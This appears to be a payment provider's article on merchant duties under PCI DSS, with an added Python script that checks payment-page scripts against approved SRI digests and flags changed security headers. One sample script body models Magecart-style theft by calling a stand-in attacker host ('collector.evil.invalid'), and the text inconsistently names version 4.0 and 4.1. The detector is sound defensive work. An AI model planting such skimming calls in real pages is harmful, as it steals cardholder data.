Merchant’s responsibilities Under PCI DSS 4.0 When Working with a PCI Compliant PSP

When considering PCI DSS 4.1 requirements, many merchants ask, “What am I responsible for?”

If you accept card payments, even through a Payment Service Provider (PSP), compliance isn’t optional and some responsibilities fall on the merchant. This guide explains your responsibilities under PCI DSS 4.1, particularly requirements related to securing payment pages and preventing client-side data breaches.

Why Merchants Must Comply with PCI DSS 4.1

PCI DSS (Payment Card Industry Data Security Standard) is mandatory for any merchant that accepts payments from Visa, Mastercard, American Express, and other major card schemes. Compliance helps protect cardholder data from breaches and fraud.

Even if your PSP manages most aspects of card processing, PCI DSS still applies. Why? Because merchant websites directly influence how payment data is transmitted to the PSP, making merchants partly responsible for securing these interactions.


PCI DSS Requirements for Merchants

Two PCI DSS requirements in particular need to be understood by merchants:

Requirement 6.4.3 – Client-Side Script Management

You must:

  • Inventory all scripts on payment pages.
  • Authorise and justify each script’s use.
  • Regularly verify scripts remain unchanged and secure.

Requirement 11.6.1 – Monitoring HTTP Headers

You must also:

  • Monitor and receive alerts for unauthorised modifications to HTTP headers.

These measures protect against threats like Magecart attacks, formjacking, and other malicious activities that exploit browser vulnerabilities.
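As an added example (not code from the original article or from Rapyd), the following Python script shows one way a merchant could automate the two checks described above: an inventory of the scripts on a payment page verified against an authorised baseline with SHA-384 digests in Subresource Integrity (SRI) form for Requirement 6.4.3, and a comparison of the security-relevant HTTP response headers against expected values for Requirement 11.6.1. The HTML, script bodies, header values and the `.invalid` hostnames are constructed sample input so that it runs offline; in production the page, scripts and headers would be fetched from the live site on a schedule and every finding would raise an alert.

```python
"""Added example (not from the original article): baseline checks for the
merchant-side payment page controls discussed in the text.

- Req. 6.4.3: inventory every <script> on the payment page, confirm each is
  authorised, and verify it is unchanged (SRI-style SHA-384 digest).
- Req. 11.6.1: compare security-relevant HTTP headers to expected values
  and flag unauthorised changes.

All page content, script bodies, headers and hostnames below are constructed
sample data so the check runs offline.
"""
import base64
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, in page order."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(src)


def sri_hash(body: bytes) -> str:
    """SRI-style digest: 'sha384-' + base64(SHA-384(body))."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()


def check_scripts(html: str, fetched: dict, baseline: dict) -> list:
    """Req. 6.4.3: return findings for unauthorised, changed or missing scripts.

    fetched  maps script src -> bytes actually served right now
    baseline maps authorised script src -> SRI digest recorded at approval time
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.scripts:
        if src not in baseline:
            findings.append(f"UNAUTHORISED script: {src}")
        elif sri_hash(fetched[src]) != baseline[src]:
            findings.append(f"CHANGED script: {src}")
    for src in baseline:
        if src not in collector.scripts:
            findings.append(f"MISSING script: {src}")
    return findings


def check_headers(observed: dict, expected: dict) -> list:
    """Req. 11.6.1: return findings for missing or altered response headers."""
    # Header names are case-insensitive, so normalise before comparing.
    observed_lc = {k.lower(): v for k, v in observed.items()}
    findings = []
    for name, value in expected.items():
        got = observed_lc.get(name.lower())
        if got is None:
            findings.append(f"MISSING header: {name}")
        elif got != value:
            findings.append(f"CHANGED header: {name}")
    return findings


# ---- constructed sample input (hypothetical page, scripts and headers) ----
PAYMENT_PAGE_HTML = """<html><head>
<script src="/js/checkout.js"></script>
<script src="/js/fraud-widget.js"></script>
<script src="https://cdn.example-analytics.invalid/tag.js"></script>
</head><body><iframe src="https://psp.example.invalid/form"></iframe></body></html>"""

# What the server is serving right now (fraud-widget.js has been modified).
FETCHED_SCRIPTS = {
    "/js/checkout.js": b"document.getElementById('pay').onclick = submitOrder;",
    "/js/fraud-widget.js": b"riskScore(); sendTo('https://collector.evil.invalid');",
    "https://cdn.example-analytics.invalid/tag.js": b"window.track = function(){};",
}

# Digests recorded when each script was reviewed and authorised.
AUTHORISED_SCRIPTS = {
    "/js/checkout.js": sri_hash(b"document.getElementById('pay').onclick = submitOrder;"),
    "/js/fraud-widget.js": sri_hash(b"riskScore();"),
}

EXPECTED_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; frame-src https://psp.example.invalid",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Frame-Options": "DENY",
}

# Observed response: CSP has been loosened and X-Frame-Options has vanished.
OBSERVED_HEADERS = {
    "content-security-policy": "default-src 'self' *; frame-src https://psp.example.invalid",
    "strict-transport-security": "max-age=31536000; includeSubDomains",
}


def run_checks() -> dict:
    """Run both checks on the sample data and return the findings."""
    return {
        "scripts": check_scripts(PAYMENT_PAGE_HTML, FETCHED_SCRIPTS, AUTHORISED_SCRIPTS),
        "headers": check_headers(OBSERVED_HEADERS, EXPECTED_HEADERS),
    }


if __name__ == "__main__":
    for area, findings in run_checks().items():
        print(area, "->", findings or ["OK"])
```

Each finding here corresponds to something the requirement expects to be alerted on: the third-party tag that was never authorised, the authorised script whose content no longer matches its approved digest, and the weakened or missing headers. Recording the SRI digest at approval time also lets the same value be placed in the script tag's `integrity` attribute so the browser refuses a tampered copy.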

Do Merchants Need PCI DSS if Using Embedded PSP Forms?

Yes. Even when you embed a PSP’s payment form (like an iframe), the merchant webpage that hosts it must comply. Unless a third party entirely hosts your payment pages, you must follow PCI DSS requirements.

How to Clarify Your Compliance Scope

Clarifying your exact PCI DSS compliance scope involves:

  • Conducting an environment evaluation.
  • Determining your precise use of PSP services.
  • Documenting all processes that interact with cardholder data.

Selecting the Right SAQ

Choosing the correct Self-Assessment Questionnaire (SAQ) is foundational to your PCI DSS compliance. 

Here’s what to keep in mind: 

  • SAQs vary depending on how payments are processed (online, phone, in-person).
  • Using the wrong SAQ risks overlooking essential security measures.
  • SAQs must be up to date with the PCI Council’s latest versions.

Not sure where to start? Bringing in a Qualified Security Assessor (QSA) or PCI Professional (PCIP) takes the guesswork out and helps you avoid costly mistakes.

Deadline for PCI DSS 4.0 Compliance

PCI DSS 4.0 is mandatory as of March 31, 2025. If you haven’t started implementing the necessary changes, now is the time.

Get PCI Compliant Payments with Global Reach

Rapyd provides comprehensive payment solutions, direct card acquiring services, and fully PCI DSS compliant card processing.

With Rapyd, you’ll benefit from:

  • Direct Visa and Mastercard acquiring in the UK, Europe, Israel and Singapore
  • Cards, Google Pay, Apple Pay, and hundreds of other payment methods
  • Among the best authorisation rates globally
  • Payments, payouts, and multi-currency business accounts